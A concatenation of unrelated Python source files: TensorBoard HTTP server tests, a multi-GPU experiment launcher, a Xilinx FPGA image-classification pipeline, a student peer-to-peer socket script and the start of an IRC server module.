self.assertEqual(
response.getheader('Cache-Control'),
'private, max-age=3600',
msg=path)
connection.close()
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/data/runs', '/data/logdir',
'/data/scalars?run=run1&tag=simple_values',
'/data/scalars?run=run1&tag=simple_values&format=csv',
'/data/images?run=run1&tag=image',
'/data/individualImage?run=run1&tag=image&index=0',
'/data/audio?run=run1&tag=audio',
'/data/run_metadata?run=run1&tag=test%20run'):
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(response.getheader('Expires'), '0', msg=path)
response.read()
connection.close()
def testScalars(self):
"""Test the format of /data/scalars."""
data = self._getJson('/data/scalars?run=run1&tag=simple_values')
self.assertEqual(len(data), self._SCALAR_COUNT)
def testScalarsCsv(self):
"""Test the csv format of /data/scalars."""
data = self._get(
'/data/scalars?run=run1&tag=simple_values&format=csv').read()
line_count = data.count('\n')
self.assertEqual(line_count,
self._SCALAR_COUNT + 1) # include 1 more line for header
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = graph_pb2.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
response = self._get('/data/individualImage?run=run1&tag=image&index=0',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), None)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = config_pb2.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
Returns:
temp_dir: The directory the test data is generated under.
"""
temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = writer_lib.FileWriter(run1_path)
histogram_value = summary_pb2.HistogramProto(
min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = graph_pb2.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
if self._only_use_meta_graph:
writer.add_meta_graph(meta_graph_def)
else:
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = config_pb2.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = summary_pb2.Summary.Image(
height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
audio_value = summary_pb2.Summary.Audio(
sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(
event_pb2.Event(
wall_time=0,
step=0,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='histogram', histo=histogram_value),
summary_pb2.Summary.Value(
tag='image', image=image_value), summary_pb2.Summary.Value(
tag='audio', audio=audio_value)
])))
# Write 100 simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(
event_pb2.Event(
# We use different values for wall time, step, and the value so we
# can tell them apart.
wall_time=100 * i,
step=10 * i,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='simple_values', simple_value=i)
])))
writer.flush()
writer.close()
return temp_dir
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
# Tests new ability to use only the MetaGraphDef
_only_use_meta_graph = True # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
def testRunName(self):
logdir = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testMultipleDirectories(self):
logdir = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testNormalizesPaths(self):
logdir = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testAbsolutifies(self):
logdir = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsGCSPath(self):
logdir = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsHDFSPath(self):
logdir = 'hdfs://foo/path'
expected = {'hdfs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotNormalizeGCSPath(self):
logdir = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRunNameWithGCSPath(self):
logdir = 'lol:gs://foo/path'
expected = {'gs://foo/path': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
class TensorBoardAssetsTest(test.TestCase):
def testTagFound(self):
tag = application.get_tensorboard_tag()
self.assertTrue(tag)
app = application.standard_tensorboard_wsgi('', True, 60, [])
self.assertEqual(app.tag, tag)
class TensorBoardPluginsTest(test.TestCase):
def testPluginsAdded(self):
def foo_handler():
pass
def bar_handler():
pass
plugins = [
FakePlugin(
plugin_name='foo',
is_active_value=True,
routes_mapping={'/foo_route': foo_handler}),
FakePlugin(
plugin_name='bar',
is_active_value=True,
routes_mapping={'/bar_route': bar_handler}),
]
# The application should have added routes for both plugins.
app = application.standard_tensorboard_wsgi('', True, 60, plugins)
# The routes are prefixed with /data/plugin/[plugin name].
self.assertDictContainsSubset({
'/data/plugin/foo/foo_route': foo_handler,
'/data/plugin/bar/bar_route': bar_handler,
}, app.data_applications)
class TensorboardSimpleServerConstructionTest(test.TestCase):
"""Tests that the default HTTP server is constructed without error.
Mostly useful for IPv4/IPv6 testing. This test should run with only IPv4, only
IPv6, and both IPv4 and IPv6 enabled.
"""
class _StubApplication(object):
tag = ''
def testMakeServerBlankHost(self):
# Test that we can bind to all interfaces without throwing an error
server, url = tensorboard.make_simple_server(
self._StubApplication(),
host='',
port=0) # Grab any available port
self.assertTrue(server)
self.assertTrue(url)
def testSpecifiedHost(self):
one_passed = False
try:
_, url = tensorboard.make_simple_server(
self._StubApplication(),
host='127.0.0.1',
port=0)
self.assertStartsWith(actual=url, expected_start='http://127.0.0.1:')
one_passed = True
except socket.error:
# IPv4 is not supported
pass
try:
_, url = tensorboard.make_simple_server(
self._StubApplication(),
host='::1',
port=0)
self.assertStartsWith(actual=url, expected_start='http://[::1]:')
one_passed = True
except socket.error:
# IPv6 is not supported
pass
self.assertTrue(one_passed) # We expect either IPv4 or IPv6 to be supported
class TensorBoardApplcationConstructionTest(test.TestCase):
def testExceptions(self):
logdir = '/fake/foo'
multiplexer = event_multiplexer.EventMultiplexer()
# Fails if there is an unnamed plugin
with self.assertRaises(ValueError):
# This plugin lacks a name.
plugins = [
FakePlugin(plugin_name=None, is_active_value=True, routes_mapping={})
]
application.TensorBoardWSGIApp(logdir, plugins, multiplexer, 0)
# Fails if there are two plugins with same name
with self.assertRaises(ValueError):
plugins = [
FakePlugin(
plugin_name='foo', is_active_value=True, routes_mapping={}),
FakePlugin(
plugin_name='foo', is_active_value=True, routes_mapping={}),
]
application.TensorBoardWSGIApp(logdir, plugins, multiplexer, 0)
if __name__ == '__main__':
test.main()
|
run_multiple.py
|
import subprocess
from subprocess import Popen
import multiprocessing as mp
mp = mp.get_context('spawn')
from itertools import product
import os
import time
from parse_dir import parse_env_subfolder, plot_best, plot_best_per_model
from main import full_train_test
import argparse
import json
def create_launch_proc(command_param, device_to_use):
env_folder = "config/env_base/"
env_ext_folder = "config/env_ext/"
model_folder = "config/model/"
model_ext_folder = "config/model_ext/"
exp_dir = 'out/'
env_file = env_folder+command_param['env']+'.json'
env_ext_file = env_ext_folder+command_param['env_ext']+'.json'
model_config = model_folder+command_param['model']+'.json'
model_ext = model_ext_folder+command_param['model_ext']+'.json'
seed = command_param['seed']
# need to be the same order as full_train_test
# full_train_test(env_config, model_config, env_extension, model_extension, exp_dir, seed=0, device=-1, args=None):
p = mp.Process(target=full_train_test, args=[env_file, model_config, env_ext_file, model_ext, exp_dir, seed, device_to_use])
p.start()
return p
def load_config_file(file):
run_multiple_config_path = os.path.join('config/run_multiple_config', file)
config = json.load(open(run_multiple_config_path, 'r'))
return config
if __name__ == '__main__':
parser = argparse.ArgumentParser('Log Parser arguments!')
parser.add_argument("-config_multiple_file", type=str, default="test.json", help="config file where you put your schedule")
args = parser.parse_args()
config = load_config_file(args.config_multiple_file)
model_to_test = config['model_to_test']
extension_to_test = config['extension_to_test']
env_config = config['env_config']
env_ext = config['env_ext']
gpu_available = config['gpu_available']
capacity_per_gpu = config['capacity_per_gpu']
n_seed = config['n_seed']
#extension_to_test = ["small_text_part", "bigger_text_part", "bigger_vision", "smaller_everything", "no_head"]
n_gpu = len(gpu_available)
n_processes = capacity_per_gpu * n_gpu
seeds = [i for i in range(n_seed)]
command_keys = ['env', 'env_ext', 'model', 'model_ext', 'seed']
all_commands = [dict(zip(command_keys, command_param)) for command_param in product(env_config, env_ext, model_to_test, extension_to_test, seeds)]
print("{} experiments to run.".format(len(all_commands)))
processes = []
command_remains = len(all_commands) > 0
for expe_num in range(n_gpu * capacity_per_gpu):
# Launch expe, fill all processes
try:
command_param = all_commands.pop()
except IndexError:
command_remains = False
break
print("Launching new expe, {} remains".format(len(all_commands)))
device_to_use = gpu_available[expe_num % n_gpu]
processes.append(create_launch_proc(command_param=command_param,
device_to_use=device_to_use))
while command_remains:
for p_num, p in enumerate(processes):
if not p.is_alive():
try:
command_param = all_commands.pop()
print("Launching new exp, {} remaining".format(len(all_commands)))
except IndexError:
command_remains = False
break
device_to_use = gpu_available[p_num % n_gpu]
new_p = create_launch_proc(command_param=command_param, device_to_use=device_to_use)
processes[p_num] = new_p
time.sleep(2)
for expe in processes:
expe.join()
print('Done running experiments')
for env_str, env_ext_str in product(env_config, env_ext):
out_dir = "out/" + env_str + '_' + env_ext_str
parse_env_subfolder(out_dir=out_dir)
plot_best(env_dir=out_dir)
plot_best_per_model(env_dir=out_dir)
|
mp_classify.py
|
#!/usr/bin/env python
#
# // SPDX-License-Identifier: BSD-3-CLAUSE
#
# (C) Copyright 2018, Xilinx, Inc.
#
import sys
import timeit
import xdnn, xdnn_io
import numpy as np
import multiprocessing as mp
import ctypes
import threading
import time
import os
manager = mp.Manager()
class ZmqResultPublisher:
def __init__(self, devid):
import zmq
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PUB)
self.socket.bind("tcp://*:55{}5".format(devid))
def send(self, data):
self.socket.send(data)
def xdnn_wait( fpgaRT, q, qPost, prepProcQ):
numProcessed = 0
while True:
i,img_list, sMemListIdx = q.get()
if i is None:
break
numProcessed += len(img_list)
fpgaRT.get_result(i)
for j in sMemListIdx:
prepProcQ.put(j)
qPost.put ( (i, img_list) )
qPost.put ( ( None, None ))
def fpga_process_async (qFrom, qTo, args, num_img, sharedInputArrs, prepProcQ, streamQ, fpgaOutputs):
ret, handles = xdnn.createHandle(args['xclbin'], "kernelSxdnn_0", [args["deviceID"]])
if ret != 0:
sys.exit(1)
fpgaRT = xdnn.XDNNFPGAOp(handles, args)
qWait = mp.Queue(maxsize=100)
numStreams = args['numstream']
bsz = args['batch_sz']
input_ptrs = []
for i in range(numStreams):
input_ptrs.append([])
numProcessed = 0
t = threading.Thread(target=xdnn_wait, args=(fpgaRT, qWait, qTo, prepProcQ, ))
t.start()
#startTime = time.time()
while numProcessed < num_img or args['perpetual']:
img_list = np.full( (bsz,), -1, dtype = np.int32 )
sId = streamQ.get()
input_ptrs[sId] = []
shMemIdxArr = []
for j in range(bsz):
(sMemIdx, img_idx) = qFrom.get()
numProcessed += 1
img_list[j] = img_idx
nparr_view = np.frombuffer(sharedInputArrs[sMemIdx].get_obj(), dtype = np.float32)
nparr_view = nparr_view[np.newaxis, ...]
input_ptrs[sId].append( nparr_view.ctypes.data_as(ctypes.POINTER(ctypes.c_float)) )
shMemIdxArr.append(sMemIdx)
if numProcessed == num_img:
break
npout_view = np.frombuffer(fpgaOutputs[sId].get_obj(), dtype = np.float32)
fpgaRT.exec_async( input_ptrs[sId], npout_view, sId)
qWait.put((sId, img_list, shMemIdxArr))
qWait.put ((None, None, None))
#elapsedTime = ( time.time() - startTime )
#print ( "FPGA_process: ", float(numProcessed)/elapsedTime, "img/s")
t.join()
xdnn.closeHandle()
#
# This function post-processes FPGA output:
# 1) Compute the final FC + Softmax layers
# 2) Print classification & accuracy
#
def post_process ( qFrom, args, img_paths, streamQ, fpgaOutputs):
numProcessed = 0
labels = xdnn_io.get_labels(args['labels'])
zmqPub = None
if args['zmqpub']:
zmqPub = ZmqResultPublisher(args['deviceID'])
goldenMap = None
if args['golden']:
goldenMap = xdnn_io.getGoldenMap(args['golden'])
top5Count = 0
top1Count = 0
(fcWeight, fcBias) = xdnn_io.loadFCWeightsBias(args)
bsz = args['batch_sz']
fcOutput = np.empty((bsz, args['outsz'],), dtype=np.float32, order='C')
start = 0
while True:
(sId, img_idx) = qFrom.get()
if numProcessed == 0:
start = timeit.default_timer()
if sId is None or img_idx is None:
break
imgList = []
for x in np.nditer(img_idx):
if x >= 0:
imgList.append(img_paths[x])
numProcessed += 1
npout_view = np.frombuffer(fpgaOutputs[sId].get_obj(), dtype = np.float32)
xdnn.computeFC(fcWeight, fcBias, npout_view, bsz, args['outsz'], args['fpgaoutsz'], fcOutput)
streamQ.put(sId)
smaxOutput = xdnn.computeSoftmax(fcOutput)
if args['golden']:
for i,p in enumerate ( imgList ):
top1Count += xdnn_io.isTopK(smaxOutput[i], goldenMap, p, labels, 1)
top5Count += xdnn_io.isTopK(smaxOutput[i], goldenMap, p, labels, 5)
if zmqPub is not None:
predictMsg = xdnn_io.getClassification(smaxOutput, imgList, labels, zmqPub = True)
zmqPub.send(predictMsg)
print ( "%g images/s" % ( float(numProcessed) / (time.time() - start ) ))
if args['golden']:
print ("\nAverage accuracy (n=%d) Top-1: %.1f%%, Top-5: %.1f%%\n") \
% (numProcessed,
float(top1Count)/float(numProcessed)*100.,
float(top5Count)/float(numProcessed)*100.)
class PreProcessManager(object):
def __init__(self, args,q, img_paths, sharedInputArrs, prepProcQ):
ret = xdnn.createManager(args['xlnxlib'])
if ret != True:
sys.exit(1)
np.random.seed(123) # for reproducibility
self._args = args
self._q = q
self._imgpaths = img_paths
current = mp.current_process()
self._procid = (int(current._identity[0]) - 1) % args['numprepproc']
self._sharedmem = sharedInputArrs
self._prepQ = prepProcQ
#HWC format as this is the native format that comes out of jpeg decode
self._meanarr = np.zeros ( (args['in_shape'][1], args['in_shape'][2], args['in_shape'][0],), dtype = np.float32, order='C' )
self._meanarr += args['img_mean']
def prepImage(self, inum):
buf_id = self._prepQ.get()
np_arr = np.frombuffer(self._sharedmem[buf_id].get_obj(), dtype = np.float32)
np_arr = np.reshape ( np_arr, (1,) + self._args['in_shape'], order = 'C')
np_arr[:], _ = xdnn_io.loadImageBlobFromFile(self._imgpaths[inum], self._args['img_raw_scale'], self._meanarr,
self._args['img_input_scale'], self._args['in_shape'][1], self._args['in_shape'][2])
self._q.put ( (buf_id, inum) )
prep_inst = None
def init_prepImage (args, q, img_paths, sharedInputArrs, prepProcQ):
global prep_inst
prep_inst = PreProcessManager(args, q, img_paths, sharedInputArrs, prepProcQ)
def run_prepImage (imgpath_idx):
return prep_inst.prepImage(imgpath_idx)
ready_list = []
def dummy_func(index):
global ready_list
ready_list.append(index)
def main():
parser = xdnn_io.default_parser_args()
parser.add_argument('--numprepproc', type=int, default=1,
help='number of parallel processes used to decode and quantize images')
parser.add_argument('--numstream', type=int, default=16,
help='number of FPGA streams')
parser.add_argument('--deviceID', type = int, default = 0,
help='FPGA no. -> FPGA ID to run in case multiple FPGAs')
args = parser.parse_args()
args = xdnn_io.make_dict_args(args)
ret = xdnn.createManager(args['xlnxlib'])
if ret != True:
sys.exit(1)
sharedInputArrs = []
fpgaOutputs = []
qPrep = mp.Queue(maxsize=args['numprepproc']*10)
qFpga = mp.Queue(maxsize=100)
streamQ = mp.Queue(maxsize=args['numstream'])
prepProcQ = mp.Queue(maxsize=100)
for i in range( args['numstream'] ):
shared_arr = mp.Array(ctypes.c_float, args['batch_sz'] * args['fpgaoutsz'])
fpgaOutputs.append(shared_arr)
streamQ.put ( i )
for i in range(100):
bufSize = np.prod(args['in_shape'])
sharedInputArrs.append( mp.Array(ctypes.c_float, bufSize) )
prepProcQ.put (i)
img_paths = xdnn_io.getFilePaths(args['images'])
p = mp.Pool( initializer = init_prepImage, initargs = (args, qPrep, img_paths, sharedInputArrs, prepProcQ, ), processes = args['numprepproc'])
xdnnProc = mp.Process(target=fpga_process_async, args=(qPrep, qFpga, args, len(img_paths), sharedInputArrs,prepProcQ, streamQ, fpgaOutputs,))
xdnnProc.start()
postProc = mp.Process(target=post_process, args=(qFpga, args, img_paths,streamQ, fpgaOutputs,))
postProc.start()
if args['perpetual']:
while True:
res = [p.map_async(run_prepImage, range(len(img_paths)))]
for j in res:
j.wait()
del j
else:
p.map_async(run_prepImage, range(len(img_paths)))
xdnnProc.join()
postProc.join()
p.close()
p.join()
if __name__ == '__main__':
main()
|
server.py
|
import socket, time, subprocess,pickle
from threading import Thread
from SocketServer import ThreadingMixIn
# '''
# TCP_IP = 'localhost'
# TCP_PORT = 9001
# BUFFER_SIZE = 1024
# class ClientThread(Thread):
# def __init__(self,ip,port,sock):
# Thread.__init__(self)
# self.ip = ip
# self.port = port
# self.sock = sock
# print " New thread started for "+ip+":"+str(port)
# def run(self):
# filename = self.sock.recv(BUFFER_SIZE)
# print "Filename Bitches : "+filename
# # filename='mytext.txt'
# f = open(filename,'rb')
# while True:
# l = f.read(BUFFER_SIZE)
# while (l):
# self.sock.send(l)
# # print('Sent ',repr(l))
# l = f.read(BUFFER_SIZE)
# if not l:
# f.close()
# self.sock.close()
# break
# tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# tcpsock.bind((TCP_IP, TCP_PORT))
# threads = []
# while True:
# tcpsock.listen(5)
# print "Waiting for incoming connections..."
# (conn, (ip,port)) = tcpsock.accept()
# print 'Got connection from ', (ip,port)
# newthread = ClientThread(ip,port,conn)
# newthread.start()
# threads.append(newthread)
# for t in threads:
# t.join()
# '''
# '''
# TCP_IP = '10.196.7.142'
# TCP_PORT = 12121
# BUFFER_SIZE = 1024
# tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
# tcpsock.bind((TCP_IP, TCP_PORT))
# tcpsock.settimeout(5)
# try:
# tcpsock.listen(5)
# print "Checking for Node Alive "+ TCP_IP
# (conn, (ip, port)) = tcpsock.accept()
# msg = conn.recv(1024)
# except socket.timeout as e:
# print e
# if msg != "Alive":
# child.liveStatus = False
# print "Node is Dead AF : "+ ip
# else:
# print "Node is Alive :) " + ip
# tcpsock.close()
# '''
# # while True:
# # TCP_IP = '10.196.7.181'
# # # some_IP = 'localhost'
# # TCP_PORT = 12121
# # BUFFER_SIZE = 1024
# # print "TCP " +TCP_IP
# # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# # s.connect(("10.196.7.181", TCP_PORT))
# # msg = "Alive"
# # print msg
# # s.send(msg)
# # s.close()
# # print "I'm Alive BRO!!!"
# # time.sleep(100)
# import subprocess
# # filename = 'client.py'
# # hashList = []
# # for i in range(1,4+1):
# # bashcommand = "md5sum "+str(filename)
# # Hash = subprocess.check_output(['bash','-c', bashcommand])
# # Hash = Hash.split(' ')
# # print Hash[0]
# # hashList.append(Hash[0])
# # print(hashList)
# # bashCommand = "ls -l | awk '{print $6, $7, $8, $9 }'"
# # fileList = subprocess.check_output(['bash','-c', bashCommand])
# # fileList = fileList.split('\n')
# # numFiles = len(fileList)
# # for i in range(1, numFiles-1):
# # item = fileList[i].split(' ')
# # timeStamp = str(item[0]) + str(item[1]) + str(item[2])
# # fileName = str(item[3])
# # print fileName
# # import os
# # filename = "abcd"
# # command = "rm "+str(filename)+"-*"
# # os.system(command)
# supernodeIPList = ['10.196.7.181']
# class Node:
# def __init__(self, IPAddr, liveStatus) :
# self.IPAddr = IPAddr
# self.liveStatus = liveStatus
# self.fileMap = {}
# def __eq__(self, other):
# if not isinstance(other, Node):
# # don't attempt to compare against unrelated types
# return NotImplemented
# return self.IPAddr == other.IPAddr
# class File:
# def __init__(self, name, h1, h2, h3, h4):
# self.name = name`
# self.h1 = h1
# self.h2 = h2
# self.h3 = h3
# self.h4 = h4
# # containing objects of Node
# childNodes = {} #{IPAddr->Node}
# IPAddr = '10.196.7.181'
# childNodes[IPAddr].fileMap['1'] = File('1', '2', '3', '4', '5')
# childNodes[IPAddr].fileMap['2'] = File('2', '2', '3', '4', '5')
# childNodes[IPAddr].fileMap['3'] = File('3', '2', '3', '4', '5')
# function to recv an object via TCP socket
'''
def recvObj(port, IPAddr):
TCP_IP = IPAddr
TCP_PORT = port
BUFFER_SIZE = 1024
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
tcpsock.settimeout(100)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(1024)
data = pickle.loads(msg)
tcpsock.close()
return data
except socket.timeout as e:
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
tcpsock.close()
#function to send an object from TCP sockets
def sendObj(port, IPAddr, obj):
TCP_IP = str(IPAddr)
TCP_PORT = port
BUFFER_SIZE = 1024
#convert object to serial stream
msg = pickle.dumps(obj)
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
p.connect((str(TCP_IP), TCP_PORT))
p.send(msg)
p.close()
except socket.error , exc:
print "Error Caught : ",exc
def showFile():
result = []
fileCache = ['123','ag','jydrstgr','asgf','efger','46sdf','asdf']
for x in fileCache:
result.append(x)
sendObj(9001, "10.196.7.181", result)
filename = recvObj(9002, "10.196.7.181")
print filename
showFile()
'''
# bashCommand = "hostname -I | awk '{print $1}'"
# IPAddr = subprocess.check_output(['bash','-c', bashCommand])
# sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
# sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# sNode.bind(("", 37020))
# while True:
# # continuously listen for broadcast msgs
# data, addr = sNode.recvfrom(1024)
# if data != '':
# sNode.sendto(IPAddr, addr)
# print "TU mc ",data
# import socket
# import subprocess
# import threading
# import os
# children = []
# def assignSuperNode():
# # accept requests to become superNode
# bashCommand = 'hostname -I | awk \'{print $1}\''
# IPAddr = subprocess.check_output(['bash','-c', bashCommand])
# sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
# sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# sNode.bind(("", 37020))
# while True:
# # continuously listen for broadcast msgs
# data, addr = sNode.recvfrom(1024)
# if data != '':
# print data
# if __name__ == "__main__":
# # print ID of current process
# print("ID of process running main program: {}".format(os.getpid()))
# # print name of main thread
# # print("Main thread name: {}".format(threading.main_thread().name))
# # creating threads
# t1 = threading.Thread(target=assignSuperNode, name='t1')
# # starting threads
# t1.start()
# # wait until all threads finish
# t1.join()
#function to receive an object from TCP sockets
bashCommand = "hostname -I | awk '{print $1}'"
myIPAddr = subprocess.check_output(['bash','-c', bashCommand])
myIPAddr = myIPAddr.split('\n')
myIPAddr = myIPAddr[0]
print "____"+str(myIPAddr)+"___"
def recvObj(port):
TCP_IP = myIPAddr
TCP_PORT = port
BUFFER_SIZE = 1024
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
tcpsock.settimeout(10)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(1024)
data = pickle.loads(msg)
tcpsock.close()
return data
except socket.timeout as e:
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
tcpsock.close()
#function to send an object from TCP sockets
def sendObj(port, IPAddr, obj):
TCP_IP = str(IPAddr)
TCP_PORT = port
BUFFER_SIZE = 1024
#convert object to serial stream
msg = pickle.dumps(obj)
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
p.connect((str(TCP_IP), TCP_PORT))
p.send(msg)
p.close()
except socket.error , exc:
print "Error Caught : ",exc
serverAddrPort = ("", 9090)
UDPClientSocket = socket.socket(family = socket.AF_INET, type = socket.SOCK_DGRAM)
UDPClientSocket.sendto('findFile', serverAddrPort)
sendObj(9002,myIPAddr, 1)
ipList = recvObj(9003)
|
server.py
|
"""
Represents the core of the server, with its main functionality and classes.
All communication between server and client is encoded with latin-1.
This ensures compatibility regardless of what encoding is used client-side.
"""
from __future__ import annotations
import socket
import threading
import queue
import fnmatch
import json
from datetime import datetime
from typing import Dict, Optional, List, Set, Tuple
import commands, errors
MANTATAIL_VERSION = "0.0.1"
SERVER_STARTED = datetime.today().ctime()
PING_TIMER_SECS = 180
CAP_LS: List[str] = ["away-notify", "cap-notify"]
ISUPPORT = {"NICKLEN": "16", "PREFIX": "(o)@", "CHANTYPES": "#", "TARGMAX": "PRIVMSG:1,JOIN:1,PART:1,KICK:1"}
class State:
"""Keeps track of existing channels & connected users."""
def __init__(self, motd_content: Optional[Dict[str, List[str]]], port: int) -> None:
"""
Attributes:
- lock: Locks the state of the server to avoid modifications
to iterables during iteration.
- supported_modes: These are the channel and user modes that the server supports.
Modes are divided into four types (A, B, C, D). Depending on the mode type,
they either must take a parameter, or they must not.
